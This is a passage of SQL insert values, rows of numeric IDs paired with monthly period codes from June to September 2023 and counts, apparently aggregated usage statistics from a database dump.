4747,2,'202306',21),(4771,2,'202306',21),(5125,2,'202306',21),(5292,2,'202306',21),(5310,2,'202306',21),(484,2,'202306',22),(1774,2,'202306',22),(2152,2,'202306',22),(2751,2,'202306',22),(2804,2,'202306',22),(3297,2,'202306',22),(4436,2,'202306',22),(4977,2,'202306',22),(5071,2,'202306',22),(5080,2,'202306',22),(488,2,'202306',23),(1724,2,'202306',23),(2658,2,'202306',23),(4341,2,'202306',23),(4529,2,'202306',23),(4657,2,'202306',23),(4753,2,'202306',23),(2178,2,'202306',24),(4551,2,'202306',24),(4663,2,'202306',24),(4768,2,'202306',24),(5276,2,'202306',24),(1718,2,'202306',25),(3313,2,'202306',25),(4524,2,'202306',25),(4706,2,'202306',25),(4762,2,'202306',25),(5131,2,'202306',25),(5268,2,'202306',25),(2159,2,'202306',26),(3090,2,'202306',26),(4674,2,'202306',26),(4700,2,'202306',26),(5295,2,'202306',26),(486,2,'202306',27),(570,2,'202306',27),(3107,2,'202306',27),(5314,2,'202306',27),(1606,2,'202306',28),(3045,2,'202306',28),(3245,2,'202306',28),(4645,2,'202306',28),(5122,2,'202306',28),(5317,2,'202306',28),(467,2,'202306',29),(4301,2,'202306',29),(5076,2,'202306',29),(5253,2,'202306',29),(3777,2,'202306',30),(4709,2,'202306',30),(4765,2,'202306',30),(5264,2,'202306',30),(5307,2,'202306',30),(1711,2,'202306',31),(3004,2,'202306',31),(3005,2,'202306',31),(3102,2,'202306',31),(4391,2,'202306',31),(4980,2,'202306',31),(469,2,'202306',33),(472,2,'202306',33),(1722,2,'202306',33),(2809,2,'202306',33),(3038,2,'202306',33),(1745,2,'202306',34),(3060,2,'202306',34),(3069,2,'202306',34),(4416,2,'202306',34),(1584,2,'202306',35),(3083,2,'202306',35),(4608,2,'202306',35),(5033,2,'202306',35),(4448,2,'202306',37),(5256,2,'202306',37),(5320,2,'202306',37),(5323,2,'202306',37),(5353,2,'202306',38),(2609,2,'202306',39),(5304,2,'202306',39),(4520,2,'202306',41),(1604,2,'202306',42),(1614,2,'202306',42),(1728,2,'202306',42),(2309,2,'202306',42),(4238,2,'202306',42),(3030,2,'202306',43),(1766,2,'202306',46),(4420,2,'202306',46),(5356,2,'202306',46),(1610,2,'202306',47),(2769,2,'202306',47),(5334,2,'202306',47),(1592,2,'202306',48),(4457,2,'202306',48),(5280,2,'202306',48),(470,2,'202306',49),(474,2,'202306',49),(335,2,'202306',51),(487,2,'202306',51),(2457,2,'202306',51),(3764,2,'202306',51),(5062,2,'202306',51),(4412,2,'202306',52),(74,2,'202306',53),(1608,2,'202306',54),(5359,2,'202306',54),(2503,2,'202306',57),(1598,2,'202306',59),(84,2,'202306',62),(3781,2,'202306',63),(1594,2,'202306',64),(473,2,'202306',66),(1612,2,'202306',66),(108,2,'202306',67),(468,2,'202306',67),(87,2,'202306',69),(1544,2,'202306',70),(1600,2,'202306',72),(4930,2,'202306',72),(5163,2,'202306',72),(1596,2,'202306',81),(1602,2,'202306',81),(1582,2,'202306',93),(76,2,'202306',102),(1586,2,'202306',104),(89,2,'202306',106),(1588,2,'202306',111),(72,2,'202306',112),(91,2,'202306',119),(68,2,'202306',130),(2904,2,'202306',412),(80,2,'202306',524),(9,2,'202306',3271),(106,2,'202307',3),(110,2,'202307',6),(4688,2,'202307',6),(1707,2,'202307',7),(4440,2,'202307',7),(3727,2,'202307',8),(4275,2,'202307',8),(4408,2,'202307',8),(4428,2,'202307',8),(4792,2,'202307',8),(4797,2,'202307',8),(1713,2,'202307',9),(3249,2,'202307',9),(3738,2,'202307',9),(3774,2,'202307',9),(3777,2,'202307',9),(4368,2,'202307',9),(4681,2,'202307',9),(3479,2,'202307',10),(4357,2,'202307',10),(4424,2,'202307',10),(4517,2,'202307',10),(4566,2,'202307',10),(4657,2,'202307',10),(4712,2,'202307',10),(4862,2,'202307',10),(5020,2,'202307',10),(1705,2,'202307',11),(1720,2,'202307',11),(2156,2,'202307',11),(3072,2,'202307',11),(3104,2,'202307',11),(3316,2,'202307',11),(3746,2,'202307',11),(4382,2,'202307',11),(4648,2,'202307',11),(4668,2,'202307',11),(4685,2,'202307',11),(4802,2,'202307',11),(5146,2,'202307',11),(5301,2,'202307',11),(1730,2,'202307',12),(1747,2,'202307',12),(1768,2,'202307',12),(1782,2,'202307',12),(2748,2,'202307',12),(2993,2,'202307',12),(3027,2,'202307',12),(3117,2,'202307',12),(3243,2,'202307',12),(3269,2,'202307',12),(3297,2,'202307',12),(3531,2,'202307',12),(3541,2,'202307',12),(3735,2,'202307',12),(3749,2,'202307',12),(4373,2,'202307',12),(4396,2,'202307',12),(4404,2,'202307',12),(4582,2,'202307',12),(4651,2,'202307',12),(4858,2,'202307',12),(4883,2,'202307',12),(5157,2,'202307',12),(5298,2,'202307',12),(5323,2,'202307',12),(483,2,'202307',13),(485,2,'202307',13),(1697,2,'202307',13),(1715,2,'202307',13),(1734,2,'202307',13),(1739,2,'202307',13),(2161,2,'202307',13),(2965,2,'202307',13),(3041,2,'202307',13),(3127,2,'202307',13),(3265,2,'202307',13),(3275,2,'202307',13),(3280,2,'202307',13),(3482,2,'202307',13),(3731,2,'202307',13),(3742,2,'202307',13),(4326,2,'202307',13),(4591,2,'202307',13),(4660,2,'202307',13),(4744,2,'202307',13),(5028,2,'202307',13),(479,2,'202307',14),(484,2,'202307',14),(2150,2,'202307',14),(2252,2,'202307',14),(3038,2,'202307',14),(3097,2,'202307',14),(3109,2,'202307',14),(3257,2,'202307',14),(3271,2,'202307',14),(3486,2,'202307',14),(3714,2,'202307',14),(3721,2,'202307',14),(3771,2,'202307',14),(4329,2,'202307',14),(4377,2,'202307',14),(4400,2,'202307',14),(4546,2,'202307',14),(4551,2,'202307',14),(4691,2,'202307',14),(4878,2,'202307',14),(4893,2,'202307',14),(4897,2,'202307',14),(5042,2,'202307',14),(5248,2,'202307',14),(471,2,'202307',15),(476,2,'202307',15),(1732,2,'202307',15),(1743,2,'202307',15),(2063,2,'202307',15),(3087,2,'202307',15),(3307,2,'202307',15),(3430,2,'202307',15),(3438,2,'202307',15),(4363,2,'202307',15),(4432,2,'202307',15),(4514,2,'202307',15),(4888,2,'202307',15),(5058,2,'202307',15),(5101,2,'202307',15),(5153,2,'202307',15),(5326,2,'202307',15),(5330,2,'202307',15),(5363,2,'202307',15),(478,2,'202307',16),(481,2,'202307',16),(1590,2,'202307',16),(1695,2,'202307',16),(1709,2,'202307',16),(1726,2,'202307',16),(1737,2,'202307',16),(1741,2,'202307',16),(1770,2,'202307',16),(2248,2,'202307',16),(2964,2,'202307',16),(2991,2,'202307',16),(3261,2,'202307',16),(3752,2,'202307',16),(4341,2,'202307',16),(4756,2,'202307',16),(4870,2,'202307',16),(5125,2,'202307',16),(5137,2,'202307',16),(5295,2,'202307',16),(1701,2,'202307',17),(1751,2,'202307',17),(1772,2,'202307',17),(1776,2,'202307',17),(1778,2,'202307',17),(2989,2,'202307',17),(3063,2,'202307',17),(3079,2,'202307',17),(3096,2,'202307',17),(3259,2,'202307',17),(3263,2,'202307',17),(3285,2,'202307',17),(4332,2,'202307',17),(4387,2,'202307',17),(4524,2,'202307',17),(4654,2,'202307',17),(4697,2,'202307',17),(4722,2,'202307',17),(4747,2,'202307',17),(5050,2,'202307',17),(5271,2,'202307',17),(5289,2,'202307',17),(5304,2,'202307',17),(102,2,'202307',18),(477,2,'202307',18),(1703,2,'202307',18),(2148,2,'202307',18),(2152,2,'202307',18),(3229,2,'202307',18),(3278,2,'202307',18),(3282,2,'202307',18),(3313,2,'202307',18),(3710,2,'202307',18),(4436,2,'202307',18),(4694,2,'202307',18),(4741,2,'202307',18),(4750,2,'202307',18),(5037,2,'202307',18),(5268,2,'202307',18),(5292,2,'202307',18),(482,2,'202307',19),(488,2,'202307',19),(1780,2,'202307',19),(2558,2,'202307',19),(2801,2,'202307',19),(2956,2,'202307',19),(3006,2,'202307',19),(3023,2,'202307',19),(3240,2,'202307',19),(3247,2,'202307',19),(3253,2,'202307',19),(3273,2,'202307',19),(3498,2,'202307',19),(3534,2,'202307',19),(3724,2,'202307',19),(4542,2,'202307',19),(4556,2,'202307',19),(5024,2,'202307',19),(480,2,'202307',20),(1711,2,'202307',20),(1749,2,'202307',20),(2165,2,'202307',20),(2297,2,'202307',20),(2813,2,'202307',20),(3226,2,'202307',20),(3267,2,'202307',20),(4416,2,'202307',20),(4996,2,'202307',20),(5128,2,'202307',20),(5140,2,'202307',20),(5259,2,'202307',20),(486,2,'202307',21),(1606,2,'202307',21),(1699,2,'202307',21),(2154,2,'202307',21),(3034,2,'202307',21),(3124,2,'202307',21),(3287,2,'202307',21),(4765,2,'202307',21),(4768,2,'202307',21),(4983,2,'202307',21),(5054,2,'202307',21),(2293,2,'202307',22),(2617,2,'202307',22),(2751,2,'202307',22),(4323,2,'202307',22),(4587,2,'202307',22),(4762,2,'202307',22),(5046,2,'202307',22),(5067,2,'202307',22),(5080,2,'202307',22),(5134,2,'202307',22),(5253,2,'202307',22),(2704,2,'202307',23),(3045,2,'202307',23),(4391,2,'202307',23),(4444,2,'202307',23),(4454,2,'202307',23),(4703,2,'202307',23),(4776,2,'202307',23),(5310,2,'202307',23),(2804,2,'202307',24),(2911,2,'202307',24),(4301,2,'202307',24),(4529,2,'202307',24),(4753,2,'202307',24),(4874,2,'202307',24),(4976,2,'202307',24),(1722,2,'202307',25),(2178,2,'202307',25),(3107,2,'202307',25),(3290,2,'202307',25),(4335,2,'202307',25),(4338,2,'202307',25),(4663,2,'202307',25),(5071,2,'202307',25),(1584,2,'202307',26),(2296,2,'202307',26),(2775,2,'202307',26),(3092,2,'202307',26),(3245,2,'202307',26),(3489,2,'202307',26),(4448,2,'202307',26),(4709,2,'202307',26),(5320,2,'202307',26),(1718,2,'202307',27),(4706,2,'202307',27),(4866,2,'202307',27),(4977,2,'202307',27),(5317,2,'202307',27),(4988,2,'202307',28),(5264,2,'202307',28),(570,2,'202307',29),(4771,2,'202307',29),(3102,2,'202307',30),(4980,2,'202307',30),(5307,2,'202307',30),(5353,2,'202307',30),(4420,2,'202307',31),(1745,2,'202307',32),(5280,2,'202307',32),(472,2,'202307',33),(5314,2,'202307',33),(5359,2,'202307',33),(467,2,'202307',34),(2159,2,'202307',34),(2609,2,'202307',34),(87,2,'202307',35),(3060,2,'202307',35),(4677,2,'202307',35),(5122,2,'202307',35),(5276,2,'202307',35),(1774,2,'202307',36),(469,2,'202307',37),(1604,2,'202307',37),(1724,2,'202307',37),(3069,2,'202307',37),(74,2,'202307',38),(4238,2,'202307',38),(4520,2,'202307',38),(4612,2,'202307',38),(5033,2,'202307',38),(5076,2,'202307',38),(2457,2,'202307',39),(3004,2,'202307',39),(3083,2,'202307',39),(4674,2,'202307',39),(3251,2,'202307',40),(4700,2,'202307',40),(5256,2,'202307',40),(2309,2,'202307',41),(3005,2,'202307',41),(5062,2,'202307',41),(5334,2,'202307',42),(5356,2,'202307',42),(108,2,'202307',44),(335,2,'202307',45),(1614,2,'202307',45),(2503,2,'202307',45),(2769,2,'202307',45),(4930,2,'202307',45),(84,2,'202307',46),(4608,2,'202307',47),(4645,2,'202307',47),(487,2,'202307',49),(1608,2,'202307',49),(2658,2,'202307',49),(474,2,'202307',50),(1592,2,'202307',50),(1766,2,'202307',51),(3066,2,'202307',52),(1728,2,'202307',54),(3090,2,'202307',54),(4412,2,'202307',54),(470,2,'202307',59),(1610,2,'202307',59),(1598,2,'202307',61),(4759,2,'202307',61),(2809,2,'202307',62),(1544,2,'202307',64),(1600,2,'202307',64),(91,2,'202307',70),(1596,2,'202307',70),(4457,2,'202307',70),(3030,2,'202307',71),(1602,2,'202307',72),(5131,2,'202307',72),(473,2,'202307',75),(3781,2,'202307',76),(5163,2,'202307',76),(3764,2,'202307',77),(89,2,'202307',79),(468,2,'202307',79),(1588,2,'202307',79),(76,2,'202307',80),(1594,2,'202307',88),(1612,2,'202307',99),(1586,2,'202307',103),(72,2,'202307',110),(1582,2,'202307',111),(68,2,'202307',114),(2904,2,'202307',183),(80,2,'202307',530),(9,2,'202307',3158),(106,2,'202308',3),(2252,2,'202308',7),(110,2,'202308',8),(1726,2,'202308',8),(4591,2,'202308',8),(4668,2,'202308',8),(1732,2,'202308',9),(1743,2,'202308',9),(1747,2,'202308',9),(1751,2,'202308',9),(2248,2,'202308',9),(3269,2,'202308',9),(1705,2,'202308',10),(1739,2,'202308',10),(2993,2,'202308',10),(3096,2,'202308',10),(3097,2,'202308',10),(3263,2,'202308',10),(3267,2,'202308',10),(3724,2,'202308',10),(4802,2,'202308',10),(4897,2,'202308',10),(1734,2,'202308',11),(1749,2,'202308',11),(3259,2,'202308',11),(3265,2,'202308',11),(3541,2,'202308',11),(3749,2,'202308',11),(4797,2,'202308',11),(4858,2,'202308',11),(5020,2,'202308',11),(1707,2,'202308',12),(1709,2,'202308',12),(1715,2,'202308',12),(1782,2,'202308',12),(2150,2,'202308',12),(3063,2,'202308',12),(3240,2,'202308',12),(3243,2,'202308',12),(3261,2,'202308',12),(3278,2,'202308',12),(3280,2,'202308',12),(3438,2,'202308',12),(3727,2,'202308',12),(4387,2,'202308',12),(4440,2,'202308',12),(4722,2,'202308',12),(4878,2,'202308',12),(1713,2,'202308',13),(1720,2,'202308',13),(1730,2,'202308',13),(1780,2,'202308',13),(2063,2,'202308',13),(2156,2,'202308',13),(3245,2,'202308',13),(3273,2,'202308',13),(3316,2,'202308',13),(3738,2,'202308',13),(4377,2,'202308',13),(4382,2,'202308',13),(4408,2,'202308',13),(4428,2,'202308',13),(4792,2,'202308',13),(4866,2,'202308',13),(4870,2,'202308',13),(4883,2,'202308',13),(1699,2,'202308',14),(1701,2,'202308',14),(1737,2,'202308',14),(2293,2,'202308',14),(2748,2,'202308',14),(3109,2,'202308',14),(3249,2,'202308',14),(3282,2,'202308',14),(4546,2,'202308',14),(4556,2,'202308',14),(4750,2,'202308',14),(4862,2,'202308',14),(5137,2,'202308',14),(1695,2,'202308',15),(1697,2,'202308',15),(1776,2,'202308',15),(2161,2,'202308',15),(3253,2,'202308',15),(3275,2,'202308',15),(3287,2,'202308',15),(3430,2,'202308',15),(3482,2,'202308',15),(3771,2,'202308',15),(3774,2,'202308',15),(4275,2,'202308',15),(4373,2,'202308',15),(4396,2,'202308',15),(4424,2,'202308',15),(4648,2,'202308',15),(4747,2,'202308',15),(4874,2,'202308',15),(4893,2,'202308',15),(5153,2,'202308',15),(482,2,'202308',16),(1772,2,'202308',16),(3104,2,'202308',16),(3257,2,'202308',16),(3714,2,'202308',16),(3731,2,'202308',16),(3746,2,'202308',16),(3752,2,'202308',16),(4329,2,'202308',16),(4368,2,'202308',16),(4432,2,'202308',16),(4514,2,'202308',16),(4517,2,'202308',16),(4691,2,'202308',16),(4888,2,'202308',16),(5028,2,'202308',16),(5157,2,'202308',16),(478,2,'202308',17),(483,2,'202308',17),(1741,2,'202308',17),(1768,2,'202308',17),(2165,2,'202308',17),(2617,2,'202308',17),(2989,2,'202308',17),(3041,2,'202308',17),(3087,2,'202308',17),(3127,2,'202308',17),(3226,2,'202308',17),(3229,2,'202308',17),(3285,2,'202308',17),(3486,2,'202308',17),(4323,2,'202308',17),(4357,2,'202308',17),(4454,2,'202308',17),(4651,2,'202308',17),(4685,2,'202308',17),(4688,2,'202308',17),(4694,2,'202308',17),(4712,2,'202308',17),(4741,2,'202308',17),(5067,2,'202308',17),(102,2,'202308',18),(476,2,'202308',18),(1745,2,'202308',18),(2148,2,'202308',18),(3271,2,'202308',18),(3297,2,'202308',18),(3742,2,'202308',18),(3777,2,'202308',18),(4332,2,'202308',18),(4400,2,'202308',18),(4404,2,'202308',18),(4444,2,'202308',18),(4524,2,'202308',18),(4566,2,'202308',18),(5037,2,'202308',18),(5330,2,'202308',18),(1711,2,'202308',19),(2297,2,'202308',19),(2991,2,'202308',19),(3072,2,'202308',19),(3092,2,'202308',19),(3107,2,'202308',19),(3479,2,'202308',19),(3498,2,'202308',19),(3531,2,'202308',19),(3710,2,'202308',19),(4326,2,'202308',19),(4697,2,'202308',19),(5046,2,'202308',19),(5101,2,'202308',19),(5363,2,'202308',19),(1590,2,'202308',20),(1778,2,'202308',20),(2775,2,'202308',20),(2965,2,'202308',20),(4436,2,'202308',20),(4582,2,'202308',20),(4756,2,'202308',20),(4768,2,'202308',20),(5134,2,'202308',20),(1703,2,'202308',21),(2558,2,'202308',21),(3005,2,'202308',21),(3038,2,'202308',21),(3079,2,'202308',21),(4391,2,'202308',21),(4416,2,'202308',21),(4542,2,'202308',21),(4706,2,'202308',21),(4762,2,'202308',21),(5042,2,'202308',21),(5248,2,'202308',21),(480,2,'202308',22),(570,2,'202308',22),(3006,2,'202308',22),(3027,2,'202308',22),(4338,2,'202308',22),(4976,2,'202308',22),(5259,2,'202308',22),(481,2,'202308',23),(488,2,'202308',23),(1718,2,'202308',23),(2154,2,'202308',23),(2813,2,'202308',23),(3023,2,'202308',23),(3034,2,'202308',23),(3247,2,'202308',23),(4341,2,'202308',23),(4448,2,'202308',23),(4681,2,'202308',23),(4744,2,'202308',23),(4753,2,'202308',23),(5264,2,'202308',23),(5268,2,'202308',23),(5289,2,'202308',23),(5292,2,'202308',23),(479,2,'202308',24),(2178,2,'202308',24),(2801,2,'202308',24),(2964,2,'202308',24),(3290,2,'202308',24),(3307,2,'202308',24),(3313,2,'202308',24),(3534,2,'202308',24),(4703,2,'202308',24),(4983,2,'202308',24),(5146,2,'202308',24),(5295,2,'202308',24),(5301,2,'202308',24),(471,2,'202308',25),(1722,2,'202308',25),(1724,2,'202308',25),(2152,2,'202308',25),(2804,2,'202308',25),(4335,2,'202308',25),(4551,2,'202308',25),(4587,2,'202308',25),(4660,2,'202308',25),(4674,2,'202308',25),(4759,2,'202308',25),(5054,2,'202308',25),(5128,2,'202308',25),(5310,2,'202308',25),(477,2,'202308',26),(2751,2,'202308',26),(3117,2,'202308',26),(4654,2,'202308',26),(5050,2,'202308',26),(5058,2,'202308',26),(5080,2,'202308',26),(5125,2,'202308',26),(5304,2,'202308',26),(5326,2,'202308',26),(485,2,'202308',27),(486,2,'202308',27),(2911,2,'202308',27),(3721,2,'202308',27),(4657,2,'202308',27),(4700,2,'202308',27),(4765,2,'202308',27),(4996,2,'202308',27),(5024,2,'202308',27),(5253,2,'202308',27),(5298,2,'202308',27),(1614,2,'202308',28),(3090,2,'202308',28),(3102,2,'202308',28),(3251,2,'202308',28),(4771,2,'202308',28),(4776,2,'202308',28),(5271,2,'202308',28),(1770,2,'202308',29),(2956,2,'202308',29),(4420,2,'202308',29),(4612,2,'202308',29),(4988,2,'202308',29),(5071,2,'202308',29),(1584,2,'202308',30),(3004,2,'202308',30),(3066,2,'202308',30),(3489,2,'202308',30),(4301,2,'202308',30),(4529,2,'202308',30),(4608,2,'202308',30),(5062,2,'202308',30),(4363,2,'202308',31),(4663,2,'202308',31),(4677,2,'202308',31),(3045,2,'202308',32),(3735,2,'202308',32),(1606,2,'202308',33),(4238,2,'202308',33),(5140,2,'202308',33),(5256,2,'202308',33),(5323,2,'202308',33),(2159,2,'202308',34),(3124,2,'202308',34),(4709,2,'202308',34),(4980,2,'202308',34),(3069,2,'202308',37),(5033,2,'202308',37),(5076,2,'202308',37),(5314,2,'202308',37),(469,2,'202308',38),(472,2,'202308',38),(484,2,'202308',38),(1774,2,'202308',38),(2296,2,'202308',38),(4977,2,'202308',38),(5280,2,'202308',38),(3083,2,'202308',39),(2457,2,'202308',41),(2658,2,'202308',41),(5307,2,'202308',41),(5317,2,'202308',41),(470,2,'202308',42),(3060,2,'202308',42),(5320,2,'202308',43),(4645,2,'202308',44),(5122,2,'202308',44),(5276,2,'202308',44),(2769,2,'202308',45),(467,2,'202308',46),(1766,2,'202308',46),(2609,2,'202308',46),(2809,2,'202308',47),(5334,2,'202308',47),(474,2,'202308',48),(2309,2,'202308',48),(74,2,'202308',49),(87,2,'202308',50),(1608,2,'202308',50),(3030,2,'202308',51),(5356,2,'202308',51),(335,2,'202308',53),(468,2,'202308',54),(5353,2,'202308',54),(5359,2,'202308',54),(1598,2,'202308',55),(108,2,'202308',56),(487,2,'202308',56),(1604,2,'202308',56),(3764,2,'202308',57),(1602,2,'202308',58),(84,2,'202308',59),(4930,2,'202308',59),(1592,2,'202308',60),(4412,2,'202308',60),(473,2,'202308',63),(1588,2,'202308',63),(1610,2,'202308',63),(2503,2,'202308',63),(1728,2,'202308',65),(2704,2,'202308',66),(3781,2,'202308',68),(1544,2,'202308',70),(1594,2,'202308',72),(4457,2,'202308',73),(1582,2,'202308',74),(4520,2,'202308',74),(1612,2,'202308',75),(5131,2,'202308',80),(1596,2,'202308',81),(1600,2,'202308',84),(91,2,'202308',87),(5163,2,'202308',94),(76,2,'202308',97),(89,2,'202308',103),(1586,2,'202308',105),(72,2,'202308',137),(2904,2,'202308',145),(68,2,'202308',169),(80,2,'202308',536),(9,2,'202308',2988),(1747,2,'202309',4),(4275,2,'202309',5),(110,2,'202309',6),(2150,2,'202309',6),(3541,2,'202309',6),(4357,2,'202309',6),(4408,2,'202309',6),(4546,2,'202309',6),(4792,2,'202309',6),(4797,2,'202309',6),(106,2,'202309',7),(1697,2,'202309',7),(1720,2,'202309',7),(3257,2,'202309',7),(3265,2,'202309',7),(3267,2,'202309',7),(3275,2,'202309',7),(3282,2,'202309',7),(4582,2,'202309',7),(4651,2,'202309',7),(4762,2,'202309',7),(4883,2,'202309',7),(5153,2,'202309',7),(479,2,'202309',8),(1699,2,'202309',8),(1701,2,'202309',8),(1715,2,'202309',8),(1726,2,'202309',8),(1732,2,'202309',8),(1741,2,'202309',8),(1743,2,'202309',8),(1749,2,'202309',8),(1778,2,'202309',8),(1780,2,'202309',8),(2063,2,'202309',8),(2248,2,'202309',8),(2558,2,'202309',8),(3027,2,'202309',8),(3229,2,'202309',8),(3243,2,'202309',8),(3249,2,'202309',8),(3261,2,'202309',8),(3269,2,'202309',8),(3280,2,'202309',8),(3307,2,'202309',8),(3721,2,'202309',8),(3724,2,'202309',8),(3771,2,'202309',8),(4326,2,'202309',8),(4368,2,'202309',8),(4428,2,'202309',8),(4542,2,'202309',8),(4591,2,'202309',8),(4648,2,'202309',8),(4756,2,'202309',8),(4771,2,'202309',8),(4858,2,'202309',8),(4862,2,'202309',8),(4874,2,'202309',8),(4996,2,'202309',8),(5020,2,'202309',8),(5028,2,'202309',8),(5271,2,'202309',8),(5383,2,'202309',8),(476,2,'202309',9),(1590,2,'202309',9),(1709,2,'202309',9),(1730,2,'202309',9),(1776,2,'202309',9),(2165,2,'202309',9),(2252,2,'202309',9),(3087,2,'202309',9),(3097,2,'202309',9),(3127,2,'202309',9),(3245,2,'202309',9),(3253,2,'202309',9),(3278,2,'202309',9),(3313,2,'202309',9),(3316,2,'202309',9),(3430,2,'202309',9),(3438,2,'202309',9),(3482,2,'202309',9),(3531,2,'202309',9),(3774,2,'202309',9),(3777,2,'202309',9),(4341,2,'202309',9),(4377,2,'202309',9),(4382,2,'202309',9),(4387,2,'202309',9),(4424,2,'202309',9),(4741,2,'202309',9),(4802,2,'202309',9),(5046,2,'202309',9),(5378,2,'202309',9),(478,2,'202309',10),(1705,2,'202309',10),(1707,2,'202309',10),(1713,2,'202309',10),(1734,2,'202309',10),(1737,2,'202309',10),(1739,2,'202309',10),(1782,2,'202309',10),(2161,2,'202309',10),(2293,2,'202309',10),(2991,2,'202309',10),(3096,2,'202309',10),(3104,2,'202309',10),(3109,2,'202309',10),(3117,2,'202309',10),(3285,2,'202309',10),(3290,2,'202309',10),(3297,2,'202309',10),(3479,2,'202309',10),(3486,2,'202309',10),(3714,2,'202309',10),(3727,2,'202309',10),(3735,2,'202309',10),(3738,2,'202309',10),(3749,2,'202309',10),(4329,2,'202309',10),(4432,2,'202309',10),(4514,2,'202309',10),(4654,2,'202309',10),(4660,2,'202309',10),(4750,2,'202309',10),(4878,2,'202309',10),(4888,2,'202309',10),(483,2,'202309',11),(1584,2,'202309',11),(1768,2,'202309',11),(2297,2,'202309',11),(2993,2,'202309',11),(3023,2,'202309',11),(3072,2,'202309',11),(3259,2,'202309',11),(3742,2,'202309',11),(3752,2,'202309',11),(4444,2,'202309',11),(4556,2,'202309',11),(4657,2,'202309',11),(4663,2,'202309',11),(4668,2,'202309',11),(4744,2,'202309',11),(4870,2,'202309',11),(5157,2,'202309',11),(1695,2,'202309',12),(1772,2,'202309',12),(2156,2,'202309',12),(2617,2,'202309',12),(2956,2,'202309',12),(2964,2,'202309',12),(3005,2,'202309',12),(3041,2,'202309',12),(3124,2,'202309',12),(3226,2,'202309',12),(3240,2,'202309',12),(3498,2,'202309',12),(4323,2,'202309',12),(4332,2,'202309',12),(4373,2,'202309',12),(4396,2,'202309',12),(4440,2,'202309',12),(4454,2,'202309',12),(4691,2,'202309',12),(4712,2,'202309',12),(4722,2,'202309',12),(4765,2,'202309',12),(4897,2,'202309',12),(5037,2,'202309',12),(5363,2,'202309',12),(477,2,'202309',13),(482,2,'202309',13),(1703,2,'202309',13),(2148,2,'202309',13),(2154,2,'202309',13),(2658,2,'202309',13),(2751,2,'202309',13),(3034,2,'202309',13),(3038,2,'202309',13),(3063,2,'202309',13),(3079,2,'202309',13),(3271,2,'202309',13),(3489,2,'202309',13),(3746,2,'202309',13),(4301,2,'202309',13),(4400,2,'202309',13),(4448,2,'202309',13),(4612,2,'202309',13),(4866,2,'202309',13),(4976,2,'202309',13),(5330,2,'202309',13),(467,2,'202309',14),(481,2,'202309',14),(1718,2,'202309',14),(1722,2,'202309',14),(1751,2,'202309',14),(2178,2,'202309',14),(2748,2,'202309',14),(2801,2,'202309',14),(2804,2,'202309',14),(2813,2,'202309',14),(3107,2,'202309',14),(3534,2,'202309',14),(3731,2,'202309',14),(4420,2,'202309',14),(4436,2,'202309',14),(4566,2,'202309',14),(4706,2,'202309',14),(5071,2,'202309',14),(5137,2,'202309',14),(5140,2,'202309',14),(5248,2,'202309',14),(5317,2,'202309',14),(5323,2,'202309',14),(5374,2,'202309',14),(488,2,'202309',15),(1745,2,'202309',15),(2911,2,'202309',15),(3006,2,'202309',15),(3045,2,'202309',15),(3102,2,'202309',15),(4416,2,'202309',15),(4551,2,'202309',15),(4681,2,'202309',15),(4688,2,'202309',15),(4747,2,'202309',15),(4759,2,'202309',15),(4893,2,'202309',15),(5067,2,'202309',15),(5125,2,'202309',15),(5134,2,'202309',15),(5268,2,'202309',15),(471,2,'202309',16),(1724,2,'202309',16),(2769,2,'202309',16),(3247,2,'202309',16),(4753,2,'202309',16),(4983,2,'202309',16),(5024,2,'202309',16),(5295,2,'202309',16),(102,2,'202309',17),(480,2,'202309',17),(486,2,'202309',17),(2965,2,'202309',17),(3083,2,'202309',17),(3273,2,'202309',17),(3710,2,'202309',17),(4335,2,'202309',17),(4404,2,'202309',17),(4517,2,'202309',17),(4694,2,'202309',17),(4697,2,'202309',17),(5058,2,'202309',17),(1774,2,'202309',18),(2989,2,'202309',18),(3287,2,'202309',18),(4587,2,'202309',18),(4685,2,'202309',18),(5080,2,'202309',18),(5264,2,'202309',18),(5301,2,'202309',18),(3092,2,'202309',19),(4700,2,'202309',19),(4988,2,'202309',19),(5042,2,'202309',19),(5050,2,'202309',19),(5128,2,'202309',19),(5276,2,'202309',19),(472,2,'202309',20),(484,2,'202309',20),(1614,2,'202309',20),(3004,2,'202309',20),(4529,2,'202309',20),(4703,2,'202309',20),(4776,2,'202309',20),(4980,2,'202309',20),(5054,2,'202309',20),(5062,2,'202309',20),(5076,2,'202309',20),(5101,2,'202309',20),(5146,2,'202309',20),(5259,2,'202309',20),(5289,2,'202309',20),(5326,2,'202309',20),(570,2,'202309',21),(1711,2,'202309',21),(2152,2,'202309',21),(3069,2,'202309',21),(3263,2,'202309',21),(4391,2,'202309',21),(4677,2,'202309',21),(4768,2,'202309',21),(5310,2,'202309',21),(5320,2,'202309',21),(469,2,'202309',22),(485,2,'202309',22),(1728,2,'202309',22),(2296,2,'202309',22),(2609,2,'202309',22),(2775,2,'202309',22),(4363,2,'202309',22),(4645,2,'202309',22),(5033,2,'202309',22),(2159,2,'202309',23),(2309,2,'202309',23),(4412,2,'202309',23),(5256,2,'202309',23),(5292,2,'202309',23),(5298,2,'202309',23),(1766,2,'202309',24),(4238,2,'202309',24),(4709,2,'202309',24),(5253,2,'202309',24),(5304,2,'202309',24),(74,2,'202309',25),(1598,2,'202309',25),(1602,2,'202309',25),(3251,2,'202309',25),(4524,2,'202309',25),(5314,2,'202309',25),(4338,2,'202309',26),(4674,2,'202309',26),(5353,2,'202309',26),(5356,2,'202309',26),(1610,2,'202309',27),(2809,2,'202309',27),(3030,2,'202309',27),(3060,2,'202309',27),(3066,2,'202309',27),(4608,2,'202309',28),(2457,2,'202309',29),(5307,2,'202309',29),(5280,2,'202309',30),(1770,2,'202309',31),(3090,2,'202309',31),(4457,2,'202309',31),(4977,2,'202309',31),(5122,2,'202309',32),(5359,2,'202309',32),(3764,2,'202309',33),(108,2,'202309',34),(468,2,'202309',34),(87,2,'202309',35),(1588,2,'202309',35),(1606,2,'202309',35),(3781,2,'202309',35),(4520,2,'202309',35),(5334,2,'202309',35),(84,2,'202309',36),(474,2,'202309',36),(1592,2,'202309',37),(470,2,'202309',39),(2503,2,'202309',39),(1594,2,'202309',40),(2704,2,'202309',40),(4930,2,'202309',40),(335,2,'202309',42),(1596,2,'202309',43),(1600,2,'202309',43),(5131,2,'202309',43),(1544,2,'202309',44),(1604,2,'202309',44),(1612,2,'202309',44),(1582,2,'202309',45),(1608,2,'202309',45),(76,2,'202309',47),(487,2,'202309',48),(1586,2,'202309',52),(5163,2,'202309',52),(91,2,'202309',68),(473,2,'202309',72),(89,2,'202309',77),(72,2,'202309',81),(68,2,'202309',89),(2904,2,'202309',1